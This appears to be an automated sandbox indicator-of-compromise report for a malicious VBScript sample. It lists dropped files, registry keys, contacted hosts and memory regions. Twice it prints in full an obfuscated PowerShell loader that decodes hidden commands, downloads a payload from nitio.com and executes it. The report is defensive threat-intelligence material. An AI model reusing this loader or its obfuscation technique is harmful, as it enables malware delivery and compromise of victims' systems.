IOC Report
PONO6188.vbs

loading gif

Files

File Path
Type
Category
Malicious
PONO6188.vbs
ASCII text, with very long lines (579), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzlr1h4g.gum.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkicgyj2.3bb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3uldc5j.i4e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xymkkhbi.5cf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Veredict.mou
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PONO6188.vbs"
malicious
C:\Windows\System32\PING.EXE
ping google.com -n 1
malicious
C:\Windows\System32\PING.EXE
ping %.%.%.%
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.ipify.org/
104.26.13.205
http://nuget.org/NuGet.exe
unknown
http://nitio.com/k2/Unconscientiousness.jpbP
unknown
http://nitio.com/k2/Unconscientiousness.jpbXR
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://nitio.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://nitio.com/k1/fdoImu226.bin
192.185.13.24
http://ftp.concaribe.com
unknown
https://aka.ms/pscore68
unknown
http://concaribe.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://nitio.com/k2/Unconscientiousness.jpb
192.185.13.24
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ftp.concaribe.com
unknown
malicious
google.com
172.217.165.206
nitio.com
192.185.13.24
api.ipify.org
104.26.13.205
concaribe.com
192.185.13.234

IPs

IP
Domain
Country
Malicious
172.217.165.206
google.com
United States
192.185.13.24
nitio.com
United States
104.26.13.205
api.ipify.org
United States
192.185.13.234
concaribe.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2418C000
trusted library allocation
page read and write
malicious
24161000
trusted library allocation
page read and write
malicious
ACF2000
direct allocation
page execute and read and write
malicious
5931000
trusted library allocation
page read and write
malicious
85C0000
direct allocation
page execute and read and write
malicious
21410070000
trusted library allocation
page read and write
malicious
22DF0EB1000
heap
page read and write
22DF0A6F000
heap
page read and write
87A0000
direct allocation
page read and write
22DF0AFF000
heap
page read and write
6B95000
heap
page execute and read and write
21400001000
trusted library allocation
page read and write
23FB8000
trusted library allocation
page read and write
21468423000
heap
page read and write
80C0000
trusted library allocation
page read and write
267F1000
trusted library allocation
page read and write
8478000
heap
page read and write
2141000F000
trusted library allocation
page read and write
2146A5C4000
heap
page read and write
7FFD34090000
trusted library allocation
page read and write
23C70000
heap
page read and write
4341F7E000
stack
page read and write
7FFD340D0000
trusted library allocation
page read and write
2D75000
trusted library allocation
page execute and read and write
E8F1AFD000
stack
page read and write
270C0000
trusted library allocation
page execute and read and write
267F0000
trusted library allocation
page read and write
24146000
trusted library allocation
page read and write
26333000
heap
page read and write
2BF4000
trusted library allocation
page read and write
21469E70000
heap
page read and write
27070000
trusted library allocation
page read and write
7FFD33F06000
trusted library allocation
page read and write
22DF0ABE000
heap
page read and write
267F0000
trusted library allocation
page read and write
7360000
trusted library allocation
page execute and read and write
267F0000
trusted library allocation
page read and write
21400A6C000
trusted library allocation
page read and write
2AA0000
heap
page read and write
23F50000
trusted library allocation
page read and write
22DF0A79000
heap
page read and write
27070000
trusted library allocation
page read and write
22DF0A89000
heap
page read and write
592B000
trusted library allocation
page read and write
5681000
trusted library allocation
page read and write
7FFD341E0000
trusted library allocation
page read and write
7FA7000
stack
page read and write
7540000
trusted library allocation
page read and write
267E3000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
206406D4000
heap
page read and write
2E16000
trusted library allocation
page execute and read and write
8D70000
direct allocation
page execute and read and write
2146A62F000
heap
page read and write
26EF0000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
21400ABD000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
26820000
trusted library allocation
page read and write
22DF0A8C000
heap
page read and write
22DF0AFF000
heap
page read and write
7FFD33E5D000
trusted library allocation
page execute and read and write
7FFD34140000
trusted library allocation
page read and write
26260000
trusted library allocation
page read and write
214102EA000
trusted library allocation
page read and write
22DF0ECD000
heap
page read and write
7FFD34160000
trusted library allocation
page read and write
2146A490000
heap
page read and write
23EBA000
stack
page read and write
7FFD33F0C000
trusted library allocation
page execute and read and write
2900000
heap
page read and write
8800000
direct allocation
page read and write
267E0000
trusted library allocation
page read and write
22DF0B02000
heap
page read and write
6E4E000
stack
page read and write
5691000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
22DF0A65000
heap
page read and write
6A4E000
stack
page read and write
2E10000
trusted library allocation
page read and write
2CDE000
stack
page read and write
26810000
trusted library allocation
page read and write
21469FD0000
heap
page execute and read and write
7350000
trusted library allocation
page read and write
45FE000
stack
page read and write
8050000
heap
page read and write
22DF0A73000
heap
page read and write
26300000
trusted library allocation
page read and write
7FFD34060000
trusted library allocation
page read and write
267C0000
trusted library allocation
page read and write
26850000
trusted library allocation
page execute and read and write
23DD000
stack
page read and write
214014CA000
trusted library allocation
page read and write
214683E1000
heap
page read and write
C0F2000
direct allocation
page execute and read and write
7322000
heap
page read and write
21401DBA000
trusted library allocation
page read and write
4B67BFF000
stack
page read and write
22DF0ABA000
heap
page read and write
26F00000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
22DF0AA9000
heap
page read and write
2CFF000
stack
page read and write
214683D5000
heap
page read and write
7520000
trusted library allocation
page read and write
25139000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
22DF0ED3000
heap
page read and write
8150000
trusted library allocation
page execute and read and write
88E7000
heap
page read and write
22DF0B20000
heap
